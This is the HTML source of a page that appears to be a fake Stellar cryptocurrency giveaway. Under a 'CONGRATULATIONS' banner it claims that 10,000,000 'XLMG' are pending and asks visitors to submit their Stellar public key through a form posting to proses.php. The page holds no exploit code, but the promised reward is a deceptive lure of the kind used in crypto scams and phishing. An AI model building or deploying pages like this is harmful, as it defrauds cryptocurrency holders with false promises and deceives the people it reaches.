<!DOCTYPE html>
<html>
    <head>
        <title>stellarport</title>
        <link rel="stylesheet" href="boby.css">
        <link rel="shortcut icon" href="favicon.ico">

        <link rel="apple-touch-icon-precomposed" sizes="57x57" href="ico/apple-touch-icon-57x57.png" />
    <link rel="apple-touch-icon-precomposed" sizes="114x114" href="ico/apple-touch-icon-114x114.png" />
    <link rel="apple-touch-icon-precomposed" sizes="72x72" href="ico/apple-touch-icon-72x72.png" />
    <link rel="apple-touch-icon-precomposed" sizes="144x144" href="ico/apple-touch-icon-144x144.png" />
    <link rel="apple-touch-icon-precomposed" sizes="60x60" href="ico/apple-touch-icon-60x60.png" />
    <link rel="apple-touch-icon-precomposed" sizes="120x120" href="ico/apple-touch-icon-120x120.png" />
    <link rel="apple-touch-icon-precomposed" sizes="76x76" href="ico/apple-touch-icon-76x76.png" />
    <link rel="apple-touch-icon-precomposed" sizes="152x152" href="ico/apple-touch-icon-152x152.png" />
    <link rel="icon" type="image/png" href="ico/favicon-196x196.png" sizes="196x196" />
    <link rel="icon" type="image/png" href="ico/favicon-96x96.png" sizes="96x96" />
    <link rel="icon" type="image/png" href="ico/favicon-32x32.png" sizes="32x32" />
    <link rel="icon" type="image/png" href="ico/favicon-16x16.png" sizes="16x16" />
    <link rel="icon" type="image/png" href="ico/favicon-128.png" sizes="128x128" />
    <meta name="application-name" content="&nbsp;"/>
    <meta name="msapplication-TileColor" content="#FFFFFF" />
    <meta name="msapplication-TileImage" content="ico/mstile-144x144.png" />
    <meta name="msapplication-square70x70logo" content="ico/mstile-70x70.png" />
    <meta name="msapplication-square150x150logo" content="ico/mstile-150x150.png" />
    <meta name="msapplication-wide310x150logo" content="ico/mstile-310x150.png" />
    <meta name="msapplication-square310x310logo" content="ico/mstile-310x310.png" />
       
    </head>
    
<body>
   
    <div class="logo"></div>
    <img src="logo1.png" width="15%"  > 
    
    <div class="logo">
    <center>   <img src="large-c-icon.png" width="20%"  ></center>   
    </div>
   <div class="container">
       
    <h2>CONGRATULATIONS<br><br><br>
         <h3>Enter Your Address Public Key 
              10.000,000 XLMG pending approval.</h3>
    </div>
    <div class="konten">
    <form action="proses.php" method="post">
        <ul>
          <li>
           <textarea name="username" id="username" cols="40" rows="3%"  placeholder="Enter:GBXN............JHXNV"  class="form-control"required ></textarea><br> <label> Enter Your Address Public Key</label>
            </li>

            <li>
               
                <button type="submit"  name="submit" id="username" >SEND</button>
            </li>
        </ul>
    </div>
    <center><img src="send-stellar.png" width="20%"  ></center>
    
    

</body>

   

</html>